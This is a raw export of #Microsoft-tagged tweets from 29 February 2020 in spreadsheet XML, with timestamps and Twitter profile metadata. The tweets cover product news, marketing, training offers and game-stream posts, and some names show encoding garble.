    <t>{'id': 140549814, 'id_str': '140549814', 'name': 'Vedran MandiÄ‡', 'screen_name': 'vekzdran', 'location': 'Zagreb', 'description': 'I write code, teach students and build software. I envy my dog. ðŸ© Developer and lecturer. An apprentice forever. I live, I die, I live again. ðŸ‡­ðŸ‡·', 'url': 'https://t.co/xjhRjLFGR8', 'entities': {'url': {'urls': [{'url': 'https://t.co/xjhRjLFGR8', 'expanded_url': 'http://www.medium.com/@vekzdran', 'display_url': 'medium.com/@vekzdran', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 640, 'friends_count': 631, 'listed_count': 115, 'created_at': 'Wed May 05 19:56:36 +0000 2010', 'favourites_count': 5351, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5516,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'http://pbs.twimg.com/profile_images/507316924665978880/hnQRmdLk_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/507316924665978880/hnQRmdLk_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/140549814/1434135958', 'profile_link_color': 'E01B25',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'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 19:06:05 +0000 2020</t>
  </si>
  <si>
    <t>!!NEW VIDEO!!
The MCSA is DEAD
How does this change YOUR plans for certification? Will they replace the exams? Is it just Windows Server? What are your next steps! I GOT YOU FAM
https://t.co/K12v07PK2M
#mcsa #sql #server #windows #microsoft #azure #powerbi</t>
  </si>
  <si>
    <t>{'id': 519563321, 'id_str': '519563321', 'name': 'Knox Hutchinson', 'screen_name': 'Data_Knox', 'location': 'Baton Rouge, Louisiana', 'description': 'NetDevOps, Azure Developer, and Business Intelligence training at CBT Nuggets', 'url': 'https://t.co/UGglfzNT2z', 'entities': {'url': {'urls': [{'url': 'https://t.co/UGglfzNT2z', 'expanded_url': 'https://learn.gg/dataknox', 'display_url': 'learn.gg/dataknox', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1413, 'friends_count': 267, 'listed_count': 7, 'created_at': 'Fri Mar 09 15:15:06 +0000 2012', 'favourites_count': 2432, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2198,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'http://pbs.twimg.com/profile_images/1154093130762936322/_6aDvMAA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154093130762936322/_6aDvMAA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/519563321/1562702632',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</si>
  <si>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19:06:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Defender adds a new weapon to the #cybersecurity battle.
https://t.co/GlJbLilWOY</t>
  </si>
  <si>
    <t>{'id': 22983532, 'id_str': '22983532', 'name': 'BitbyBit', 'screen_name': 'BitxBit', 'location': 'New York, NY', 'description': 'Providing superior IT Managed Services &amp; support for over 30 years. We empower your business to get the most from your technology investment.', 'url': 'http://t.co/SJktQWj1vM', 'entities': {'url': {'urls': [{'url': 'http://t.co/SJktQWj1vM', 'expanded_url': 'http://www.bitxbit.com', 'display_url': 'bitxbit.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 187, 'listed_count': 9, 'created_at': 'Thu Mar 05 21:39:01 +0000 2009', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1078, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9DE067', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/626098192816300032/PaTjomis_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/626098192816300032/PaTjomis_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22983532/1438108360', 'profile_link_color': '0808C2',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</si>
  <si>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19:00:45 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is slowly pulling the curtain back on its dual-screen Surface Duo and #Surface Neo. @TechCrunch #SaturdayMorning #cdwsocial https://t.co/3LIl5xmK3O</t>
  </si>
  <si>
    <t>Sat Feb 29 19:00:30 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft     Watch this 28-second video to get a 10,000-foot view on how #MSDyn365BC connects businesses, enables smarter decisions, and helps foster growth. #MSDyn365 #Technology #IT https://t.co/6vnbj9DjsR</t>
  </si>
  <si>
    <t>Sat Feb 29 18:54:33 +0000 2020</t>
  </si>
  <si>
    <t>It is sort of astounding how bad #OneDrive is as a consumer photos app. Amazed that #Microsoft has done so little to improve this over the years.</t>
  </si>
  <si>
    <t>{'id': 2367599551, 'id_str': '2367599551', 'name': 'Sean McBride, SW Samurai', 'screen_name': 'bushidocodes', 'location': 'Alexandria, VA', 'description': '#WebAssembly Research @GWCOMPSCI | Software + History Nerd | @USArmy Veteran ðŸ‡ºðŸ‡¸ | @WestPoint_USMA "Ring Knocker" | Former @IBM, FAA, @Fullstack, @DecipherNow', 'url': 'https://t.co/UAGgtLNRft', 'entities': {'url': {'urls': [{'url': 'https://t.co/UAGgtLNRft', 'expanded_url': 'https://www.bushido.codes/', 'display_url': 'bushido.codes', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 322, 'friends_count': 465, 'listed_count': 20, 'created_at': 'Sat Mar 01 20:37:36 +0000 2014', 'favourites_count': 1492, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2186,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'http://pbs.twimg.com/profile_images/1193264842548895744/ds7J7O7H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193264842548895744/ds7J7O7H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2367599551/1544056264', 'profile_link_color': 'FF0800',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</si>
  <si>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18:53:01 +0000 2020</t>
  </si>
  <si>
    <t>Why Microsoft Azure is an excellent choice for the future of your businesss cloud migration and infrastructure hosting strategy? Read our blog and let us know: https://t.co/vDbgVjcXww #Microsoft #Azure</t>
  </si>
  <si>
    <t>Sat Feb 29 18:52:33 +0000 2020</t>
  </si>
  <si>
    <t>#Apple #Microsoft #Laptops 8 of the best laptop brands for 2020 https://t.co/7WrkaVO1CN https://t.co/9af4POU4sJ</t>
  </si>
  <si>
    <t>Sat Feb 29 18:50:40 +0000 2020</t>
  </si>
  <si>
    <t>Always been a fan of remote work. Shouldn't take a pandemic, it's just common sense stuff. Just bought 3 new stock positions Fri in support of remote work: msft, vmw, zm. What are you buying? #dontpanic #investinfuture #businesscontinuity #Microsoft #VMware #zoomvideo #vcommunity</t>
  </si>
  <si>
    <t>{'id': 37982513, 'id_str': '37982513', 'name': 'Robert Morris', 'screen_name': 'vCommunityRM', 'location': '', 'description': 'Former CEO of Advantec Global Services Inc', 'url': 'https://t.co/UdYeE5yceL', 'entities': {'url': {'urls': [{'url': 'https://t.co/UdYeE5yceL', 'expanded_url': 'http://www.advantec.us', 'display_url': 'advantec.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 502, 'friends_count': 68, 'listed_count': 37, 'created_at': 'Tue May 05 18:17:39 +0000 2009', 'favourites_count': 699, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2400,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'http://pbs.twimg.com/profile_images/2729556798/29611924ab9efc5b7613600a5ece7f3b_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2729556798/29611924ab9efc5b7613600a5ece7f3b_normal.png',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</si>
  <si>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18:47:13 +0000 2020</t>
  </si>
  <si>
    <t>The Project AM2R Creator Now Designs Levels For The Ori Developer Moon Studios https://t.co/lnT51Zodxm #Random #MoonStudios #Microsoft via @nintendolife</t>
  </si>
  <si>
    <t>{'id': 3082657701, 'id_str': '3082657701', 'name': 'Besim Lika', 'screen_name': 'RealBesbk', 'location': 'New York', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 68, 'friends_count': 594, 'listed_count': 10, 'created_at': 'Mon Mar 09 22:45:01 +0000 2015', 'favourites_count': 2466, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2916,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'http://pbs.twimg.com/profile_images/575066130219278337/SZ_2VrZI_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/575066130219278337/SZ_2VrZI_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3082657701/1425942736',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</si>
  <si>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18:44:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Dynamics365 update is focused on harnessing data https://t.co/UKgDf0nKaG https://t.co/9WLJ1KmB8k</t>
  </si>
  <si>
    <t>{'id': 38374100, 'id_str': '38374100', 'name': 'Winson Tang', 'screen_name': 'winsontang', 'location': 'Vancouver, BC', 'description': 'ðŸ‡¨ðŸ‡¦Canadian based technology leader and marketer.  Here on Twitter, I often curate and tweet tech rants and news on a daily basis.  Enjoy!', 'url': 'https://t.co/7azNjIAvgK', 'entities': {'url': {'urls': [{'url': 'https://t.co/7azNjIAvgK', 'expanded_url': 'http://winsontang.com', 'display_url': 'winsontang.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9959, 'friends_count': 9306, 'listed_count': 510, 'created_at': 'Thu May 07 05:07:11 +0000 2009', 'favourites_count': 322, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 107341,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'http://pbs.twimg.com/profile_images/1205198472040701953/bIGJM4qb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205198472040701953/bIGJM4qb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38374100/1576176424', 'profile_link_color': '666666', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '142734', 'profile_text_color': 'B6AFAF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 18:40:24 +0000 2020</t>
  </si>
  <si>
    <t>@msftsecurity great job #CyberSecurity #infosec #microsoft #edge #pua https://t.co/nehOxcxjJU</t>
  </si>
  <si>
    <t>{'id': 3873329660, 'id_str': '3873329660', 'name': 'FSI', 'screen_name': 'fortifiedsec', 'location': 'Washington, DC', 'description': 'Mentoring cyber warriors in advancing their careers to the next level âš”ï¸ðŸ›¡  ðŸ› Made in Washington D.C.                Click on the link ðŸ‘‡ for more info!', 'url': 'https://t.co/VHTqF4dm3B', 'entities': {'url': {'urls': [{'url': 'https://t.co/VHTqF4dm3B', 'expanded_url': 'https://fortifiedservices.com', 'display_url': 'fortifiedservices.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 189, 'listed_count': 8, 'created_at': 'Mon Oct 12 20:49:04 +0000 2015', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 288,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'http://pbs.twimg.com/profile_images/1071108935191552000/0mRaoR0t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1071108935191552000/0mRaoR0t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3873329660/1544207245',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</si>
  <si>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18:36:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft with @AzureHeroes is making history of #gamification but many other projects are joining, so @enjin created a new digital place to talk about the stories of these pioneering games, apps, and projects.
#enjin #ethereum #microsoft
Learn more: https://t.co/2aleGfl1QJ https://t.co/S7I2nZHhgn</t>
  </si>
  <si>
    <t>{'id': 1080561932560674816, 'id_str': '1080561932560674816', 'name': 'Gecko Multiverse', 'screen_name': 'geckomultiverse', 'location': 'Crypta', 'description': 'Discovering new #gaming experiences powered by @Enjin', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 430, 'friends_count': 74, 'listed_count': 5, 'created_at': 'Wed Jan 02 20:30:15 +0000 2019', 'favourites_count': 1214, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 943,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'http://pbs.twimg.com/profile_images/1151879121808613376/Wo8yrgOI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151879121808613376/Wo8yrgOI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1080561932560674816/1546513952',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</si>
  <si>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18:33:34 +0000 2020</t>
  </si>
  <si>
    <t>Awesome day @scottishsummit. Great speakers and sessions. Short write up in the link below but a blog will soon follow on my LinkedIn to covering the sessions I attended.
#SS2020 #ScottishSummit #MSDyn365 #Microsoft #Dynamics365 #PowerPlatform #MSAdvocate
https://t.co/2Vk90VUXxc</t>
  </si>
  <si>
    <t>Sat Feb 29 18:31:19 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Hiding Windows File Extensions is a Security Risk, Enable Now:" https://t.co/KyikgAyoxn
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Sat Feb 29 18:30:19 +0000 2020</t>
  </si>
  <si>
    <t>Data is vital for any type of business. But if you can't analyze it and draw conclusions, that data isn't very useful  and, for this purpose, neither are you. #microsoft https://t.co/j7Wi6l3d0v https://t.co/Ceq0PQMzn0</t>
  </si>
  <si>
    <t>Sat Feb 29 18:30:13 +0000 2020</t>
  </si>
  <si>
    <t>PING: LMDE, #Android 11, LibreOffice, Remmina, #Firefox VPN, FSF  #Microsoft.... https://t.co/fPVicW3PrL</t>
  </si>
  <si>
    <t>{'id': 603247153, 'id_str': '603247153', 'name': 'Gnu/Linux en espaÃ±ol', 'screen_name': 'linux_es', 'location': '', 'description': 'Noticias sobre GNU/Linux diarias.', 'url': 'https://t.co/jel2moFMnK', 'entities': {'url': {'urls': [{'url': 'https://t.co/jel2moFMnK', 'expanded_url': 'http://motivostudio.com', 'display_url': 'motivostudio.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 374, 'friends_count': 48, 'listed_count': 24, 'created_at': 'Sat Jun 09 02:33:39 +0000 2012', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4561,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'http://pbs.twimg.com/profile_images/2291353751/gnu_meditate_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2291353751/gnu_meditate_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/603247153/1445407019',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</si>
  <si>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Sat Feb 29 18:28:41 +0000 2020</t>
  </si>
  <si>
    <t>You know what! #Microsoft recently switched the #Edge browser to #Google's #Chromium engine. Apparantly Google has started warning Edge users that Chrome is the more secure #browser. Check out to learn more! https://t.co/EjpZxhUXXy
#techtothefuture #tech #technology #technologies https://t.co/ExF6xKs3be</t>
  </si>
  <si>
    <t>{'id': 145494927, 'id_str': '145494927', 'name': 'MashTips', 'screen_name': 'mashtips', 'location': 'UNITED STATES', 'description': 'MashTips is a media website that covers technology news, guides, gadgets, reviews, software, hardware tips, mobile apps, and online resources.', 'url': 'https://t.co/tTW1FGzLeo', 'entities': {'url': {'urls': [{'url': 'https://t.co/tTW1FGzLeo', 'expanded_url': 'https://mashtips.com', 'display_url': 'mashtips.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3109, 'friends_count': 431, 'listed_count': 12, 'created_at': 'Wed May 19 03:25:16 +0000 2010', 'favourites_count': 60, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2796, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B2E0FF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1209938787813470208/rwqJVoFC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209938787813470208/rwqJVoFC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/145494927/1578194775', 'profile_link_color': '2B96ED',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</si>
  <si>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Sat Feb 29 18:27:34 +0000 2020</t>
  </si>
  <si>
    <t>Great chance to see our collaboration with 
@Microsoft in @BusinessPlusMag
 #microsoft #collaboration #Ireland #irishbusiness https://t.co/WN9WuvJiko</t>
  </si>
  <si>
    <t>{'id': 738374432352305152, 'id_str': '738374432352305152', 'name': 'Carillion Comms', 'screen_name': 'CarillionComms', 'location': 'Unit 8, Central Estate, Denmark Street, Maidenhead, South East', 'description': 'Leading AV integration experts, Carillion supports organisations in understanding how collaborative technology can revolutionise the working environment.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 297, 'friends_count': 63, 'listed_count': 28, 'created_at': 'Thu Jun 02 14:19:17 +0000 2016', 'favourites_count': 405, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 963,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'http://pbs.twimg.com/profile_images/1135521800669077504/aDCV_OB2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1135521800669077504/aDCV_OB2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/738374432352305152/1564481835',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</si>
  <si>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18:25:51 +0000 2020</t>
  </si>
  <si>
    <t>#GameOfThrones' 
#MaisieWilliams and boyfriend  arrive in #Paris https://t.co/qBMBx585Sl via @DailyMailCeleb 
#bigdata 
#Twitter #socialmedia 
@Chidambara09 #linux 
#Celebrity #model #actress #movies #pop #fashion 
#Singer #Music #pop 
#actress #apple #microsoft 
#celebrities</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</si>
  <si>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927178,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</si>
  <si>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18:24:48 +0000 2020</t>
  </si>
  <si>
    <t>Thanks for attending the #MinecraftEDU session at #ETC2020! Ill always be here to help you implement #Minecraft in your classroom! @PlayCraftLearn #Microsoft https://t.co/j4Txq6OauH</t>
  </si>
  <si>
    <t>{'id': 190149610, 'id_str': '190149610', 'name': 'Umayr Sufi', 'screen_name': 'umayrsufi', 'location': 'Silicon Valley ', 'description': 'Iâ€™m a seeker of justice, student of knowledge, and a Drum Major super hero. Proud @UCDavis Alum. Dev Specialist @Microsoft - All views are my own!', 'url': 'https://t.co/QOUaWpP150', 'entities': {'url': {'urls': [{'url': 'https://t.co/QOUaWpP150', 'expanded_url': 'http://www.umayrsufi.com', 'display_url': 'umayrsufi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 612, 'friends_count': 710, 'listed_count': 12, 'created_at': 'Mon Sep 13 05:40:57 +0000 2010', 'favourites_count': 865, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2296,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'http://pbs.twimg.com/profile_images/949400484351131648/uJxDBbth_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/949400484351131648/uJxDBbth_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/190149610/1415685250',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</si>
  <si>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Sat Feb 29 18:21:59 +0000 2020</t>
  </si>
  <si>
    <t>GATE will provide you with the tech-saavy staff and strategies that you need to make your business move in the right direction. We are always ahead of the technology curve! 
https://t.co/KIC9C1aco4
#technology #business #cloudcomputing #it #cybersecurity #ai #microsoft #amazon</t>
  </si>
  <si>
    <t>{'id': 38670306, 'id_str': '38670306', 'name': 'GATE Staffing, LLC.', 'screen_name': 'GATE_Staffing', 'location': 'NEW YORK CITY', 'description': 'GATE -  Technology Staffing for partners. We staff the right candidate with speed and accuracy. \n\n#CRM #ATS #technology #staffing #technologystaff', 'url': 'https://t.co/fwgiBglV2L', 'entities': {'url': {'urls': [{'url': 'https://t.co/fwgiBglV2L', 'expanded_url': 'https://www.gatestaffing.com', 'display_url': 'gatestaffing.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 148, 'friends_count': 52, 'listed_count': 2, 'created_at': 'Fri May 08 13:59:12 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 573,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'http://pbs.twimg.com/profile_images/1120710712307933184/Hrvsuhip_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1120710712307933184/Hrvsuhip_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38670306/1580781948',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</si>
  <si>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18:18:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will end live tiles in #Windows10 start menu. I personally will not miss them, I did not find them very useful. 
https://t.co/bhoDBb6gJB</t>
  </si>
  <si>
    <t>{'id': 2785763630, 'id_str': '2785763630', 'name': 'Wolfgang Taitl', 'screen_name': 'vNote42', 'location': 'Ã–sterreich', 'description': 'Blogging virtualization and storage stuff, writing #PowerCLI, VCP 2,3,4,5,6, VCAP-DCV, VCIX-DCV, VCP6-NV, HPE MASE Storage, HPE ASE Server, #vExpert (3x)', 'url': 'https://t.co/fhNNBCDRiR', 'entities': {'url': {'urls': [{'url': 'https://t.co/fhNNBCDRiR', 'expanded_url': 'https://vnote42.wordpress.com', 'display_url': 'vnote42.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 169, 'friends_count': 282, 'listed_count': 4, 'created_at': 'Tue Sep 02 11:26:55 +0000 2014', 'favourites_count': 105, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 317,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'http://pbs.twimg.com/profile_images/1217199379347574784/Luznf0qK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217199379347574784/Luznf0qK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2785763630/1554840765',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</si>
  <si>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18:17:13 +0000 2020</t>
  </si>
  <si>
    <t>#UptoDate with #Microsoft #Teams! subtitles are generally available and more! https://t.co/vLcJ6lnl2q</t>
  </si>
  <si>
    <t>{'id': 3400191081, 'id_str': '3400191081', 'name': 'Noureen Syed', 'screen_name': 'NoureenSyed', 'location': '', 'description': 'On a knowledge quest forever. FamJam. Traveller. Market Strategy Lead - Microsoft Canada #CloudNative #AppsInfr #ModernWorkplace #BizApps #DataAI\n #MSFTAdvocate', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 361, 'friends_count': 549, 'listed_count': 27, 'created_at': 'Sun Aug 02 16:41:06 +0000 2015', 'favourites_count': 1738, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2890,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'http://pbs.twimg.com/profile_images/913460131773472768/4XWb6eQg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/913460131773472768/4XWb6eQg_normal.jpg',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</si>
  <si>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18:15:29 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 18:15:09 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 18:10:08 +0000 2020</t>
  </si>
  <si>
    <t>You can save today on #Microsoft, #Cisco, #AWS, #ITIL and #cybersecurity training! Use promo code GTR2020 to score a 30% DISCOUNT on Guaranteed to Run training courses. https://t.co/vaEwZXvwxz
#ittraining #training #itprofessional #techtraining #specialoffer https://t.co/syWG4MCRxG</t>
  </si>
  <si>
    <t>{'id': 39249429, 'id_str': '39249429', 'name': 'ðŸGKCanada', 'screen_name': 'GKCanada', 'location': 'Canada', 'description': 'IT, business and leadership training with training locations across Canada; on-site training and virtual delivery online. ðŸ‡¨ðŸ‡¦', 'url': 'https://t.co/b2SmGROUoH', 'entities': {'url': {'urls': [{'url': 'https://t.co/b2SmGROUoH', 'expanded_url': 'http://ter.li/gkcanada', 'display_url': 'ter.li/gkcanada', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1949, 'friends_count': 1270, 'listed_count': 171, 'created_at': 'Mon May 11 13:22:52 +0000 2009', 'favourites_count': 489, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14196,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'http://pbs.twimg.com/profile_images/3499646499/489ee6172ae1860751e50d0a49ae3180_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3499646499/489ee6172ae1860751e50d0a49ae3180_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39249429/1528826413', 'profile_link_color': '4B88BE', 'profile_sidebar_border_color': '003366', 'profile_sidebar_fill_color': 'BAD8E9', 'profile_text_color': '003366', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 18:08:34 +0000 2020</t>
  </si>
  <si>
    <t>#Sora, #Donald and #Goofy go back to some old places in the 27th part of my playthrough of the #XboxOne version of #KingdomHeartsFinalMixHD from #SquareEnix and #Disney #Keyblade #XboxOneX #Microsoft #GameGuide #Walkthrough #1080p #60fps #FullHD https://t.co/b7GwEvyFy1</t>
  </si>
  <si>
    <t>{'id': 147548111, 'id_str': '147548111', 'name': "eMPlay's Modetro", 'screen_name': 'eMPlaysModetro', 'location': 'United Kingdom', 'description': 'Plays games old and new, and sometimes chats about them too.', 'url': 'https://t.co/EKFsAPAhNE', 'entities': {'url': {'urls': [{'url': 'https://t.co/EKFsAPAhNE', 'expanded_url': 'https://www.twitch.tv/emplaysmodetro', 'display_url': 'twitch.tv/emplaysmodetro', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 648, 'friends_count': 1691, 'listed_count': 25, 'created_at': 'Mon May 24 12:27:34 +0000 2010', 'favourites_count': 1682, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5238,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'http://pbs.twimg.com/profile_images/1056665897815949312/KDexGckS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1056665897815949312/KDexGckS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/147548111/1481153309',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</si>
  <si>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18:08:30 +0000 2020</t>
  </si>
  <si>
    <t>#Sora, #Donald and #Goofy fly to #Neverland in the 26th part of my playthrough of the #XboxOne version of #KingdomHeartsFinalMixHD from #SquareEnix and #Disney #Keyblade #XboxOneX #Microsoft #GameGuide #Walkthrough #1080p #60fps #FullHD https://t.co/78wvteKE8I</t>
  </si>
  <si>
    <t>Sat Feb 29 18:08:24 +0000 2020</t>
  </si>
  <si>
    <t>#Sora, #Donald and #Goofy gain the #PegasusCup in the 25th part of my playthrough of the #XboxOne version of #KingdomHeartsFinalMixHD from #SquareEnix and #Disney #Keyblade #XboxOneX #Microsoft #GameGuide #Walkthrough #1080p #60fps #FullHD https://t.co/05ZyFjwJP9</t>
  </si>
  <si>
    <t>Sat Feb 29 18:08:18 +0000 2020</t>
  </si>
  <si>
    <t>#Sora, #Donald and #Goofy defeat #OogieBoogie in the 24th part of my playthrough of the #XboxOne version of #KingdomHeartsFinalMixHD from #SquareEnix and #Disney #Keyblade #XboxOneX #Microsoft #GameGuide #Walkthrough #1080p #60fps #FullHD https://t.co/BX9gXNQPk6</t>
  </si>
  <si>
    <t>Sat Feb 29 18:08:07 +0000 2020</t>
  </si>
  <si>
    <t>#Sora, #Donald and #Goofy go to #HalloweenTown in the 23rd part of my playthrough of the #XboxOne version of #KingdomHeartsFinalMixHD from #SquareEnix and #Disney #Keyblade #XboxOneX #Microsoft #GameGuide #Walkthrough #1080p #60fps #FullHD https://t.co/phHMS93TQB</t>
  </si>
  <si>
    <t>Sat Feb 29 18:08:02 +0000 2020</t>
  </si>
  <si>
    <t>#Sora, #Donald and #Goofy take down a villainous witch in the 22nd part of my playthrough of the #XboxOne version of #KingdomHeartsFinalMixHD from #SquareEnix and #Disney #Keyblade #XboxOneX #Microsoft #GameGuide #Walkthrough #1080p #60fps #FullHD https://t.co/gDpAI0XP57</t>
  </si>
  <si>
    <t>Sat Feb 29 18:07:56 +0000 2020</t>
  </si>
  <si>
    <t>#Sora, #Donald and #Goofy go down to #Atlantica in the 21st part of my playthrough of the #XboxOne version of #KingdomHeartsFinalMixHD from #SquareEnix and #Disney #Keyblade #XboxOneX #Microsoft #GameGuide #Walkthrough #1080p #60fps #FullHD https://t.co/g39kVTfMRS</t>
  </si>
  <si>
    <t>Sat Feb 29 18:01:00 +0000 2020</t>
  </si>
  <si>
    <t>According to #BillGates, #COVID19 poses a serious threat. Its far more deadly and contagious than many other deadly viruses. Gates founded The Bill and Melinda #GatesFoundation to help improve world #health
https://t.co/55IHkYLlOO
#coronavirus #microsoft #disease #virus</t>
  </si>
  <si>
